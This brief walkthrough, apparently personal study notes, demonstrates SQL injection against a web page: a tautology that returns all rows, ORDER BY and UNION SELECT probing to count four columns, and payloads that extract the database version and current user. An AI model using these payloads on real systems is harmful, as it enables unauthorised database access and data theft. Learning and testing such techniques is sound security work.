Union Injection

April 17, 2024

First we need to visit the page

Then we will try the classic sql injection that will return everything

' or 1=1;-- -

Then try just to evaluate the correct number of columns in the table.

We can see here we used the union and order by to determine that there is only 4 columns in the table.

' UNION SELECT 1,2,3,4-- -

' ORDER BY 4-- -

' UNION SELECT 1,@@version,3,4-- -

' UNION select 1,user(),3,4-- -

Last updated 6 months ago